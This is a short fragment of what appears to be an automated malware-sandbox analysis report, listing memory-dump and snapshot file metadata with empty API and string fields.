                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904456411.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_146d000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: